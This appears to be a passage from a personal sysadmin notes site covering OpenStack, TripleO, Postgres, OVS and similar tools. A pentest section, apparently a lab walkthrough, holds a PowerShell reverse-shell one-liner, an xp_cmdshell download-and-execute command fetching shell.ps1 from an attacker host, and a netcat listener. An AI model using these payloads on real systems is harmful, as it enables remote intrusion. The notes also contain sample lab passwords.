    openstack flavor create --ram 1024 --disk 10 --vcpus 1 --public small-flavor\n\nopenstack flavor create --ram 16384 --disk 21 --vcpus 8 \\\n--private \\\n--project $PROJECT_ID_HERE \\\n--property aggregate_instance_extra_specs:$HOST_AGG_NAME_HERE='true' \\\n--property hw:cpu_policy='dedicated' \\\n--property hw:cpu_thread_policy='prefer' \\\n--property hw:mem_page_size='1GB' \\\n--property hw:numa_cpus.0='1-7' \\\n--property hw:numa_cpus.1='0' \\\n--property hw:numa_mem.0='8192' \\\n--property hw:numa_mem.1='8192' \\\n--property hw:numa_mempolicy='strict' \\\n--property hw:numa_nodes='2' \\\nTEST\n
    "},{"location":"openstack/#create-vm","title":"Create VM","text":"
    openstack server create --image e090519f-91f6-4c21-baf5-08642d0bd28b --flavor f60498da-a9a9-4772-a05c-75b4aaa6389a --network e23f7863-6e84-4395-bbbb-45877e950f2a cumulus-1\nopenstack server create --image e090519f-91f6-4c21-baf5-08642d0bd28b --flavor f60498da-a9a9-4772-a05c-75b4aaa6389a --network e23f7863-6e84-4395-bbbb-45877e950f2a cumulus-2\n
    "},{"location":"openstack/#compute-node-requirements","title":"Compute node requirements","text":"
    https://docs.openstack.org/nova/rocky/install/compute-install-rdo.html\nhttps://docs.openstack.org/neutron/rocky/install/compute-install-rdo.html\nhttps://docs.openstack.org/neutron/rocky/install/compute-install-option1-rdo.html\n
    "},{"location":"openstack/#create-a-external-network-with-a-subnet-attached-to-that-network","title":"Create a external network with a subnet attached to that network.","text":"
    neutron net-create EXT_NET --router:external True --provider:physical_network physnet1 --provider:network_type vlan --provider:segmentation_id 70\nneutron subnet-create EXT_NET --name EXT_SUB --allocation-pool start=192.168.70.10,end=192.168.70.100 --disable-dhcp --gateway 192.168.70.1 192.168.70.0/24\n
    "},{"location":"openstack/#random-commands","title":"Random commands","text":"
    #Create image\nopenstack image create --disk-format qcow2 --container-format bare --public --file ./cirros-0.4.0-x86_64-disk.img cirros-0.4.0\n\n#Create flavor\nopenstack flavor create --ram 1024 --disk 10 --vcpus 1 --public small-flavor\n\n#Create network\nopenstack network create network-floating-ip1\nopenstack floating ip create --subnet floating-ip-1\n\n#Create provider network with vlan\nopenstack network create --share --provider-physical-network provider --provider-network-type vlan provider1\n
    /etc/hosts\n\n10.12.0.2     controller01\n\n10.12.0.3       compute01\n10.12.0.4       compute02\n10.12.0.5       compute03\n\n\n################################\n\n10.12.0.3       compute01\n\n10.12.0.2       controller01\n10.12.0.4       compute02\n10.12.0.5       compute03\n\n\n################################\n\n10.12.0.4       compute02\n\n10.12.0.2       controller01\n10.12.0.3       compute01\n10.12.0.5       compute03\n\n################################\n\n10.12.0.5       compute03\n\n10.12.0.2       controller01\n10.12.0.3       compute01\n10.12.0.4       compute02\n
    Placeholder password : openstack2019\n\nRABBIT_PASS : openstack2019\nrabbitmqctl add_user openstack openstack2019\n\nGRANT ALL PRIVILEGES ON keystone.* TO 'keystone'@'localhost' \\\nIDENTIFIED BY 'openstack2019';\nGRANT ALL PRIVILEGES ON keystone.* TO 'keystone'@'%' \\\nIDENTIFIED BY 'openstack2019';\n\n\nconnection = mysql+pymysql://keystone:openstack2019@controller01/keystone\n\n\nkeystone-manage bootstrap --bootstrap-password openstack2019 \\\n  --bootstrap-admin-url http://controller01:5000/v3/ \\\n  --bootstrap-internal-url http://controller01:5000/v3/ \\\n  --bootstrap-public-url http://controller01:5000/v3/ \\\n  --bootstrap-region-id RegionOne\n\n\nexport OS_USERNAME=admin\nexport OS_PASSWORD=openstack2019\nexport OS_PROJECT_NAME=admin\nexport OS_USER_DOMAIN_NAME=Default\nexport OS_PROJECT_DOMAIN_NAME=Default\nexport OS_AUTH_URL=http://controller01:5000/v3\nexport OS_IDENTITY_API_VERSION=3\n\n\n\nopenstack domain create --description \"Test Domain\" example\n\nopenstack project create --domain default \\\n  --description \"Service Project\" service\n\n\nGRANT ALL PRIVILEGES ON glance.* TO 'glance'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\n\nGRANT ALL PRIVILEGES ON glance.* TO 'glance'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\n\nwww_authenticate_uri  = http://controller01:5000\nauth_url = http://controller01:5000\nmemcached_servers = controller01:11211\nauth_type = password\nproject_domain_name = Default\nuser_domain_name = Default\nproject_name = service\nusername = glance\npassword = openstack2019\n\n\n\n### Deploy Compute NOVA service on Controller node.\n
    CREATE DATABASE nova_api;\nCREATE DATABASE nova;\nCREATE DATABASE nova_cell0;\nCREATE DATABASE placement;\n\n\nGRANT ALL PRIVILEGES ON nova_api.* TO 'nova'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\nGRANT ALL PRIVILEGES ON nova_api.* TO 'nova'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\nGRANT ALL PRIVILEGES ON nova.* TO 'nova'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\nGRANT ALL PRIVILEGES ON nova.* TO 'nova'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\nGRANT ALL PRIVILEGES ON nova_cell0.* TO 'nova'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\nGRANT ALL PRIVILEGES ON nova_cell0.* TO 'nova'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\nGRANT ALL PRIVILEGES ON placement.* TO 'placement'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\nGRANT ALL PRIVILEGES ON placement.* TO 'placement'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\n\nopenstack user create --domain default --password-prompt nova\n\nopenstack role add --project service --user nova admin\n\n\nopenstack service create --name nova \\\n  --description \"OpenStack Compute\" compute\n\nopenstack endpoint create --region RegionOne \\\n  compute public http://controller01:8774/v2.1\n\nopenstack endpoint create --region RegionOne \\\n  compute internal http://controller01:8774/v2.1\n\nopenstack endpoint create --region RegionOne \\\n  compute admin http://controller01:8774/v2.1\n\nopenstack endpoint create --region RegionOne \\\n  placement public http://controller01:8778\n\nopenstack endpoint create --region RegionOne \\\n  placement internal http://controller01:8778\n\n\nopenstack endpoint create --region RegionOne \\\n  placement admin http://controller01:8778\n\n\nmodprobe br_netfilter\necho \"$(sysctl -w net.bridge.bridge-nf-call-iptables=1)\" >> /etc/sysctl.conf\necho \"$(sysctl -w net.bridge.bridge-nf-call-ip6tables=1)\" >> /etc/sysctl.conf\nsysctl -p /etc/sysctl.conf\n\n\n\nGRANT ALL PRIVILEGES ON neutron.* TO 'neutron'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\n\nGRANT ALL 
PRIVILEGES ON neutron.* TO 'neutron'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\nopenstack endpoint create --region RegionOne \\\n  network public http://controller01:9696\n\nopenstack endpoint create --region RegionOne \\\n  network internal http://controller01:9696\n\nopenstack endpoint create --region RegionOne \\\n  network admin http://controller01:9696\n\n\nopenstack subnet create --network provider \\\n  --allocation-pool start=10.13.0.100,end=10.13.0.200 \\\n  --dns-nameserver 10.13.0.1 --gateway 10.13.0.1 \\\n  --subnet-range 10.13.0.0/24 provider\n\n\n\nopenstack server create --flavor m1.nano --image cirros \\\n  --nic net-id=dee9dde7-0edb-4311-a06e-5ffb98144527 --security-group default \\\n  provider-instance\n\n\nnova-manage cell_v2 map_cell0\nnova-manage db sync\n
    "},{"location":"openvpn/","title":"OpenVPN","text":""},{"location":"openvpn/#connect-to-a-remote-server","title":"Connect to a remote server","text":"
    sudo openvpn --config s2s-client.ovpn --daemon --status /var/log/openvpn-status 5\n
    "},{"location":"opnfv/","title":"OPNFV","text":""},{"location":"opnfv/#random-notes","title":"Random notes","text":"

    Source : https://readthedocs.org/projects/opnfv-yardstick/downloads/pdf/stable-hunter/

    Yardstick GUI : http://10.10.99.43:8888/gui/index.html (Need the full path)

    #Main folder\n/home/opnfv/repos/yardstick\n#Workspace\n/tmp/workspace/yardstick\n
    "},{"location":"ovs/","title":"OVS","text":""},{"location":"ovs/#openstack-ovs-concepts","title":"Openstack OVS concepts","text":"

    br-int

    br-tun

    br-ext

    "},{"location":"ovs/#useful-commands","title":"Useful commands","text":"
    ovs-vsctl list interface\novs-vsctl list port\novs-vsctl show\novs-appctl fdb/show mybridge\n

    Show all OVS Bridges (OVS Bridges are virtual switches that are linking different ports creating in each switch)

    ovs-vsctl show\n

    List interfaces/ports attached to a bridge

    ovs-vsctl list-ifaces br-int\n
    "},{"location":"pentest/","title":"Pentesting","text":""},{"location":"pentest/#recon","title":"RECON","text":""},{"location":"pentest/#windows-commands","title":"Windows commands","text":"

    Output the contents of a file

    type potato\n

    Show current user

    whoami\n
    "},{"location":"pentest/#nmap","title":"NMAP","text":"

    Find TCP ports that are active

    ports=$(nmap -p- --min-rate=1000 -T4 $TARGET_IP | grep ^[0-9] | cut -d '/' -f 1 | tr '\\n' ',' | sed s/,$//)\n\nnmap -p- --min-rate=1000 -T4 $TARGET_IP -v\n

    Scan the ports that we're found + service detection.

    nmap -sC -sV -p$ports $TARGET_IP\n\nlaurentdumont@cr300-kali:~$ nmap -sC -sV -p 1433 10.10.10.27\nStarting Nmap 7.80 ( https://nmap.org ) at 2020-11-12 12:37 EST\nNmap scan report for 10.10.10.27\nHost is up (0.034s latency).\n\nPORT     STATE SERVICE  VERSION\n1433/tcp open  ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM\n| ms-sql-ntlm-info: \n|   Target_Name: ARCHETYPE\n|   NetBIOS_Domain_Name: ARCHETYPE\n|   NetBIOS_Computer_Name: ARCHETYPE\n|   DNS_Domain_Name: Archetype\n|   DNS_Computer_Name: Archetype\n|_  Product_Version: 10.0.17763\n| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback\n| Not valid before: 2020-11-06T18:53:07\n|_Not valid after:  2050-11-06T18:53:07\n|_ssl-date: 2020-11-12T18:56:28+00:00; +1h18m29s from scanner time.\n\nHost script results:\n|_clock-skew: mean: 1h18m28s, deviation: 0s, median: 1h18m28s\n| ms-sql-info: \n|   10.10.10.27:1433: \n|     Version: \n|       name: Microsoft SQL Server 2017 RTM\n|       number: 14.00.1000.00\n|       Product: Microsoft SQL Server 2017\n|       Service pack level: RTM\n|       Post-SP patches applied: false\n|_    TCP port: 1433\n
    "},{"location":"pentest/#smb-file-sharing","title":"SMB (file sharing)","text":"

    List Shares

    smbclient -N -L \\\\\\\\$TARGET_IP\\\\\n

    Connect to Share

    smbclient -N \\\\\\\\$TARGET_IP\\\\backups\n

    Get files from share

    laurentdumont@cr300-kali:~$ smbclient -N \\\\\\\\10.10.10.27\\\\backups\nTry \"help\" to get a list of possible commands.\nsmb: \\> dir\n  .                                   D        0  Tue Nov 10 17:21:13 2020\n  ..                                  D        0  Tue Nov 10 17:21:13 2020\n  prod.dtsConfig                     AR      609  Mon Jan 20 07:23:02 2020\n  user.txt                            A       32  Tue Feb 25 09:37:36 2020\n\n                10328063 blocks of size 4096. 7108669 blocks available\n\nsmb: \\> get user.txt\ngetting file \\user.txt of size 32 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)\n
    "},{"location":"pentest/#using-imppacket","title":"Using ImpPacket","text":"
    git clone https://github.com/SecureAuthCorp/impacket\n# Move the utility from ./examples into the root folder\n\n# Run the utility\npython3 mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth\n\n# OR INSTALL ALL EXAMPLES (execute in project root folder)\npip3 install .\n
    "},{"location":"pentest/#microsoft-sql","title":"Microsoft SQL","text":""},{"location":"pentest/#check-if-user-is-admin","title":"Check if user is admin","text":"
    SQL> SELECT IS_SRVROLEMEMBER ('sysadmin')\n\n\n-----------   \n\n          1   \n

    IF 1 user is admin.

    "},{"location":"pentest/#validate-in-which-context-sql-server-is-running-and-enable-the-xp_cmdshell-module","title":"Validate in which context SQL Server is running and enable the 'xp_cmdshell' module.","text":"
    EXEC sp_configure 'Show Advanced Options', 1;\nreconfigure;\nsp_configure;\n\nEXEC sp_configure 'xp_cmdshell', 1\nreconfigure;\nxp_cmdshell \"whoami\"\n\nSQL>  xp_cmdshell \"whoami\" \noutput                                                                             \n\n--------------------------------------------------------------------------------   \n\narchetype\\sql_svc                                                                  \n\nNULL\n
    "},{"location":"pentest/#netcat-nc","title":"NETCAT (nc)","text":"

    Create a listener on tcp port 443

    sudo nc -lvnp 443\n
    "},{"location":"pentest/#windows-shell","title":"Windows Shell","text":"

    Attempt to connect to a listener and open a shell using TCP port 443. You need to replace the IP of the machine that is listening (with nc for example)

    $client = New-Object System.Net.Sockets.TCPClient(\"10.10.14.3\",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"# \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() \n

    Execute the command on the SQL server. This will attempt to get the shell.ps1 file and execute it in the context of the user running the SQL server.

    xp_cmdshell \"powershell \"IEX (New-Object Net.WebClient).DownloadString(\\\"http://10.10.14.53/shell.ps1\\\");\"\n
    "},{"location":"pentest/#burp","title":"BURP","text":""},{"location":"pentest/#burp-intruder-sniper","title":"BURP Intruder Sniper","text":"
    GET /cdn-cgi/login/admin.php?content=accounts&id=\u00a7param1\u00a7 HTTP/1.1\nHost: 10.10.10.28\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: user=34322; role=admin\nConnection: close\n
    "},{"location":"pentest/#privilege-escalation-flow","title":"Privilege escalation flow","text":""},{"location":"pentest/#information-gathering","title":"Information gathering","text":"

    Get OS version

    lsb_release -a\n

    Get Kernel version

    uname -a\n

    Get current user info

    id\n
    "},{"location":"postgres/","title":"Postgres","text":""},{"location":"postgres/#connect-to-a-database","title":"Connect to a database","text":"
    psql -h 192.168.2.40 -U postgres hq_data\n
    "},{"location":"postgres/#create-a-database-and-a-user-with-admin-privileges","title":"Create a database and a user with admin privileges","text":"
    sudo apt-get install postgresql postgresql-client\nsudo -u postgres psql\ncreate database netbox;\ncreate user netbox_user with encrypted password 'test';\ngrant all privileges on database netbox to netbox_user;\n
    "},{"location":"postgres/#create-read-only-user","title":"Create Read only user","text":"
    CREATE ROLE read_only_user WITH LOGIN PASSWORD 'vKDHrGZuhH6vNf01VdyJ' \nNOSUPERUSER INHERIT NOCREATEDB NOCREATEROLE NOREPLICATION VALID UNTIL 'infinity';\n\\connect hq_data;\n\nGRANT CONNECT ON DATABASE hq_data TO read_only_user;\nGRANT USAGE ON SCHEMA public TO read_only_user;\nGRANT SELECT ON ALL TABLES IN SCHEMA public TO read_only_user;\nGRANT SELECT ON ALL SEQUENCES IN SCHEMA public TO read_only_user;\nREVOKE CREATE ON SCHEMA public FROM PUBLIC;\n\nALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT SELECT ON TABLES TO read_only_user;\n
    "},{"location":"postgres/#show-databases","title":"Show databases","text":"
    postgres=# \\l\n                                  List of databases\n   Name    |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges   \n-----------+----------+----------+-------------+-------------+-----------------------\n ara       | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =Tc/postgres         +\n           |          |          |             |             | postgres=CTc/postgres+\n           |          |          |             |             | ara_user=CTc/postgres\n postgres  | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | \n template0 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +\n           |          |          |             |             | postgres=CTc/postgres\n template1 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +\n           |          |          |             |             | postgres=CTc/postgres\n(4 rows)\n
    "},{"location":"postgres/#show-users","title":"Show users","text":"
    ara=> \\du\n                                   List of roles\n Role name |                         Attributes                         | Member of \n-----------+------------------------------------------------------------+-----------\n ara_user  | Create DB                                                  | {}\n postgres  | Superuser, Create role, Create DB, Replication, Bypass RLS | {}\n
    "},{"location":"postgres/#show-tables","title":"Show tables","text":"
    SELECT *\nFROM pg_catalog.pg_tables\nWHERE schemaname != 'pg_catalog' AND \n    schemaname != 'information_schema';\n
    "},{"location":"postgres/#describe-a-table","title":"Describe a table","text":"
    \\d TABLE NAME\n
    "},{"location":"postgres/#drop-table","title":"Drop table","text":"
    drop table hq_electricity_consumption ;\n
    "},{"location":"postgres/#show-active-user-sessions","title":"Show active user sessions","text":"
    select pid as process_id, \n       usename as username, \n       datname as database_name, \n       client_addr as client_address, \n       application_name,\n       backend_start,\n       state,\n       state_change\nfrom pg_stat_activity;\n
    "},{"location":"prometheus/","title":"Prometheus","text":"
    #Docker volume - Prometheus config\nsudo docker volume create prometheus-config\n\n#Docker volume - Prometheus metrics and adata\nsudo docker volume create prometheus-data\n\nsudo docker run -d -p 9090:9090 -v prometheus-config:/prometheus-config -v prometheus-data:/prometheus prom/prometheus --config.file=/prometheus-config/prometheus.yml\n

    Grafana container

    sudo docker volume create grafana-config\nsudo docker run \\\n  -d \\\n  -p 3000:3000 \\\n  --name=grafana \\\n  -v grafana-storage:/var/lib/grafana \\\n  -e \"GF_SECURITY_ADMIN_PASSWORD=PASSWORD_HERE\" \\\n  grafana/grafana\n

    Blackbox exporter

    docker run --rm -d -p 9115:9115 --name blackbox_exporter -v `pwd`:/config prom/blackbox-exporter:master --config.file=/config/blackbox.yml\n
    "},{"location":"proxmox/","title":"Proxmox","text":""},{"location":"proxmox/#user-and-permission-management","title":"User and permission management","text":""},{"location":"proxmox/#full-admin-over-specific-vms","title":"Full admin over specific VMs","text":"
    # Pool + VM are inside that pool.\n# Assume that the user already exists and we want to allow permissions on a specific group of VM.\npveum groupadd po-vm-group -comment \"PO VMs only\"\npveum aclmod /pool/PO-POOL-1/ -group po-vm-group -role PVEAdmin\npveum usermod riyoth@pam -group po-vm-group\n
    "},{"location":"python/","title":"Python","text":""},{"location":"python/#install-latest-python-on-ubuntu-side-by-side-with-os-version","title":"Install latest python on Ubuntu side by side with OS version","text":"
    sudo add-apt-repository ppa:deadsnakes/ppa\nsudo apt install python3.13-full\npython3.13 --version\n
    "},{"location":"python/#profiling-a-python-application","title":"Profiling a python application.","text":"
    pip3 install line_profiler\n

    Add the @profile to each function that is to be profiled

    # Use the decorator\n@profile\ndef some_func(*args, **kwargs)\n    ...\n

    Start the profiling process

    python3 -m line_profiler tag-exporter.py.lprof\n
    Timer unit: 1e-06 s\n\nTotal time: 2e-06 s\nFile: tag-exporter.py\nFunction: __init__ at line 13\n\nLine #      Hits         Time  Per Hit   % Time  Line Contents\n==============================================================\n    13                                               @profile\n    14                                               def __init__(self):\n    15         1          2.0      2.0    100.0          self._endpoint = '6666'\n\nTotal time: 14.99 s\nFile: tag-exporter.py\nFunction: collect at line 17\n\nLine #      Hits         Time  Per Hit   % Time  Line Contents\n==============================================================\n    17                                               @profile\n    18                                               def collect(self):\n    19         5        115.0     23.0      0.0          GITLAB_PROJECTS_ID_LIST = os.getenv('GITLAB_PROJECTS_ID').split(',')\n    20         5         47.0      9.4      0.0          GITLAB_API_TOKEN = os.getenv('GITLAB_API_TOKEN')\n    21                                           \n    22         5      25743.0   5148.6      0.2          gl = gitlab.Gitlab('https://gitlab.gitlab.maker.studio', private_token=GITLAB_API_TOKEN, ssl_verify=False)\n    23                                           \n    24                                           \n    25        23         28.0      1.2      0.0          for project_id in GITLAB_PROJECTS_ID_LIST:\n    26        19    4103967.0 215998.3     27.4              project = gl.projects.get(project_id)\n    27        19    2781067.0 146371.9     18.6              tags = project.tags.list(per_page='1')\n    28                                                       # Get most recent tag - the tag list is returned \n    29        19        189.0      9.9      0.0              latest_tag = tags[0]\n    30                                           \n    31                                           \n    32        19         66.0      3.5      0.0         
     gitlab_tag_metric = Metric('gitlab_tag_version',\n    33        19        494.0     26.0      0.0          'Latest Gitlab tags for the project', 'summary')\n    34        19         73.0      3.8      0.0              gitlab_tag_metric.add_sample('gitlab_tag_version',\n    35        19        822.0     43.3      0.0          value='0', labels={'tag_version':str(latest_tag.name), 'project_name':str(project.name)})\n    36        19         51.0      2.7      0.0              yield gitlab_tag_metric\n    37                                           \n    38                                                       # Get the .gitlab-ci.yml from reach project in order to validate the target from the releases\n    39        18    4162769.0 231264.9     27.8              file_content = project.files.raw('.gitlab-ci.yml', 'master')\n    40        18    3913465.0 217414.7     26.1              test = yaml.safe_load(file_content)\n    41       144        132.0      0.9      0.0              for library_name, version_value in test['variables'].items():\n    42       126         85.0      0.7      0.0                  if 'VERSION' in library_name:\n    43        54         32.0      0.6      0.0                      library_version = version_value\n    44        54         39.0      0.7      0.0                      project_version_req = Metric('project_version_req',\n    45        54        287.0      5.3      0.0                      'Project versions requirements in Master branch', 'summary')\n    46        54         39.0      0.7      0.0                      project_version_req.add_sample('project_version_req',\n    47        54        432.0      8.0      0.0                      value='0', labels={'project':str(project.name), 'library_name':str(library_name),'target_version':str(library_version)})\n    48        54         38.0      0.7      0.0                      yield project_version_req\n
    "},{"location":"rasppi/","title":"RaspPi","text":"
    /home/user/.config/autostart/.desktop\n\n[Desktop Entry]\nType=Application\nExec=lxterminal -e \"vlc --fullscreen --loop --no-osd /home/bacon/Documents/ccop-loop.mp4\"\n
    "},{"location":"security/","title":"Security","text":""},{"location":"security/#disable-rpcbind","title":"Disable RPCBind.","text":"
    systemctl stop rpcbind.socket\nsystemctl disable rpcbind.socket\nsystemctl stop rpcbind\nsystemctl disable rpcbind\nnetstat -punta | grep 111\n
    "},{"location":"splunk/","title":"Splunk","text":""},{"location":"splunk/#_1","title":"Splunk","text":"

    Clear the splunk index and all data gathered. Will delete most of the existing data!

    cd /opt/splunk/bin\n./splunk stop\n./splunk clean eventdata\n./splunk start\n
    "},{"location":"terraform/","title":"Terraform","text":""},{"location":"terraform/#deployment-flow","title":"Deployment flow","text":"
    terraform init\nterraform apply\n
    "},{"location":"terraform/#terraform-debug","title":"Terraform debug","text":"
    TF_LOG=DEBUG OS_DEBUG=1 terraform apply\n
    "},{"location":"tripleo/","title":"Tripleo","text":""},{"location":"tripleo/#update-all-the-system-packages-first","title":"Update all the system packages first","text":"
    yum update\n
    "},{"location":"tripleo/#undercloud-deployment","title":"Undercloud deployment","text":"
    sudo useradd stack\nsudo passwd stack  # specify a password\n\necho \"stack ALL=(root) NOPASSWD:ALL\" | sudo tee -a /etc/sudoers.d/stack\nsudo chmod 0440 /etc/sudoers.d/stack\n\nsu - stack\n
    "},{"location":"tripleo/#get-the-packages-for-centos","title":"Get the packages for Centos","text":"
    sudo yum install -y https://trunk.rdoproject.org/centos7/current/python2-tripleo-repos-0.0.1-0.20191108012952.2655019.el7.noarch.rpm\n
    "},{"location":"tripleo/#install-the-rocky-repository","title":"Install the Rocky repository","text":"
    sudo -E tripleo-repos -b stein current\n
    "},{"location":"tripleo/#get-the-tripleo-cli-client-lots-of-stuff-to-install","title":"Get the TripleO CLI client (lots of stuff to install)","text":"
    sudo yum install -y python-tripleoclient\n
    "},{"location":"tripleo/#copy-the-default-deployment-template","title":"Copy the default deployment template","text":"
    cp /usr/share/python-tripleoclient/undercloud.conf.sample ~/undercloud.conf\n
    "},{"location":"tripleo/#deploy-the-undercloud","title":"Deploy the Undercloud","text":"
    openstack undercloud install\n
    "},{"location":"tripleo/#add-dns-to-overcloud","title":"Add DNS to Overcloud","text":"
    (undercloud) [stack@director ~]$ openstack subnet list\n+--------------------------------------+-----------------+--------------------------------------+-----------------+\n| ID                                   | Name            | Network                              | Subnet          |\n+--------------------------------------+-----------------+--------------------------------------+-----------------+\n| 08a306ed-a5e8-47cd-ac66-a67722d03a42 | ctlplane-subnet | fcda1208-3d2c-4b9c-a241-c4bcd0479b9f | 192.168.24.0/24 |\n+--------------------------------------+-----------------+--------------------------------------+-----------------+\n\nopenstack subnet set 08a306ed-a5e8-47cd-ac66-a67722d03a42 --dns-nameserver 8.8.8.8\n
    "},{"location":"tripleo/#overcloud-deployment","title":"Overcloud Deployment","text":"
    export DIB_YUM_REPO_CONF=\"/etc/yum.repos.d/delorean*\"\n\n#Build the images for the Overcloud\nopenstack overcloud image build\n\n# Upload the images\nopenstack overcloud image upload\n
    "},{"location":"tripleo/#register-the-nodes","title":"Register the nodes","text":"

    The instackenv.json file.

    {\n    \"nodes\": [\n        {\n            \"mac\":[\n                \"52:54:00:25:ca:d3\"\n            ],\n            \"name\": \"ooo-controller001\",\n            \"pm_type\": \"ipmi\",\n            \"cpu\": \"4\",\n            \"memory\": \"9216\",\n            \"disk\": \"50\",\n            \"arch\": \"x86_64\",\n            \"pm_user\": \"test\",\n            \"pm_password\": \"secret\",\n            \"pm_addr\": \"10.10.99.62\",\n            \"pm_port\": \"16001\"\n        },\n        {\n            \"mac\":[\n                \"52:54:00:1a:cc:2a\"\n            ], \n            \"name\": \"ooo-controller002\",\n            \"pm_type\": \"ipmi\",\n            \"cpu\": \"4\",\n            \"memory\": \"9216\",\n            \"disk\": \"50\",\n            \"arch\": \"x86_64\",\n            \"pm_user\": \"test\",\n            \"pm_password\": \"secret\",\n            \"pm_addr\": \"10.10.99.62\",\n            \"pm_port\": \"16002\"\n        },\n        {\n            \"mac\":[\n                \"52:54:00:1c:0c:94\"\n            ],\n            \"name\": \"ooo-controller003\",\n            \"pm_type\": \"ipmi\",\n            \"cpu\": \"4\",\n            \"memory\": \"9216\",\n            \"disk\": \"50\",\n            \"arch\": \"x86_64\",\n            \"pm_user\": \"test\",\n            \"pm_password\": \"secret\",\n            \"pm_addr\": \"10.10.99.62\",\n            \"pm_port\": \"16003\"\n        }\n    ]\n}\n
    "},{"location":"tripleo/#create-the-nodes-within-ironic-openstack","title":"Create the nodes within Ironic Openstack","text":"
    openstack overcloud node import instackenv.json\n
    "},{"location":"tripleo/#ironic-paths","title":"Ironic paths","text":"
    #DNSMASQ\n/var/lib/ironic-inspector/dhcp-hostsdir\n#Ironic PXE\n/var/lib/ironic/httpboot/\n
    "},{"location":"tripleo/#list-nodes","title":"List nodes","text":"
    openstack baremetal node list\n
    "},{"location":"tripleo/#start-introspection","title":"Start introspection","text":"
    openstack overcloud node introspect --all-manageable\n\n# One node\nopenstack overcloud node introspect 32124951-3fcc-4da4-ba16-d05a3c66bb22\n
    "},{"location":"tripleo/#if-introspection-works-make-nodes-available","title":"If introspection works, make nodes available","text":"
    openstack overcloud node provide --all-manageable\n
    "},{"location":"tripleo/#deploy-overcloud","title":"Deploy Overcloud","text":"
    openstack overcloud deploy --templates\n
    "},{"location":"tripleo/#get-extra-hardware-specs-from-ironic","title":"Get extra-hardware-specs from Ironic.","text":"
    openstack baremetal introspection data save 32124951-3fcc-4da4-ba16-d05a3c66bb22\n
    "},{"location":"tripleo/#delete-deployed-overcloud","title":"Delete deployed Overcloud","text":"
    (undercloud) [stack@ooo-director ~]$ openstack stack list\n+--------------------------------------+------------+----------------------------------+--------------------+----------------------+--------------+\n| ID                                   | Stack Name | Project                          | Stack Status       | Creation Time        | Updated Time |\n+--------------------------------------+------------+----------------------------------+--------------------+----------------------+--------------+\n| a078f570-c4fa-46bc-87d5-ebb2c99684e4 | overcloud  | 8a6fa7c4e66a422281bd800007c65e4d | CREATE_IN_PROGRESS | 2019-12-26T04:00:21Z | None         |\n+--------------------------------------+------------+----------------------------------+--------------------+----------------------+--------------+\n\n#Might need to do 2-3 times... (not sure why)\n(undercloud) [stack@ooo-director ~]$ openstack stack delete a078f570-c4fa-46bc-87d5-ebb2c99684e4\nAre you sure you want to delete this stack(s) [y/N]? y\n\n\nopenstack overcloud plan delete overcloud\n
    "},{"location":"tripleo/#list-overcloud-nodes-profiles","title":"List Overcloud nodes profiles","text":"
    openstack overcloud profiles list\n
    "},{"location":"tripleo/#set-computecontroller-profile","title":"Set compute/controller profile","text":"
    openstack baremetal node set --property capabilities='profile:compute,boot_option:local' \n
    "},{"location":"vmware/","title":"Vmware","text":"
    1  df -h\n2  cd /storage/log/\n3  ls\n4  cd vmware/\n5  ls\n6  du -a /var | sort -n -r | head -n 10\n7  du h-a /var | sort -n -r | head -n 10\n8  df -h\n9  cd ..\n

    10 du h-a /var | sort -n -r | head -n 10 11 cd /var/log/ 12 ls 13 du -ha /var | sort -n -r | head -n 10 14 ls -alh 15 cd vmware 16 ls 17 du -ha /var | sort -n -r | head -n 10 18 ls -alh 19 du -ha /var | sort -n -r | head -n 100 20 ls -alh /storage/log/vmware/sso/tomcat/ 21 du -hs /storage/log/vmware/sso/tomcat/ 22 du -hs /storage/log/vmware 23 du -hs /storage/log/vmware/eam/ 24 du -hs /storage/log/vmware/lookupsvc/ 25 du -hs /storage/log/vmware/lookupsvc/tomcat/ 26 ls -alh /storage/log/vmware/lookupsvc/tomcat/ 27 du -hs /storage/log/vmware/lookupsvc/tomcat/ 28 rm /storage/log/vmware/lookupsvc/tomcat/localhost_access.2021- 29 df -h 30 /usr/lib/vmware-vmca/bin/certificate-manager 31 cat /var/log/vmware/vmcad/certificate-manager.log 32 ping colo.coldnorthadmin.com 33 /usr/lib/vmware-vmca/bin/certificate-manager 34 ping 10.199.199.1 35 dig google.ca 36 dig colo.coldnorthadmin.com 37 dig vcenter.colo.coldnorthadmin.com 38 clear 39 /usr/lib/vmware-vmca/bin/certificate-manager 40 cd/etc/vmware-sso 41 cd /etc/vmware-sso 42 ls 43 cd keys/ 44 ls 45 history | 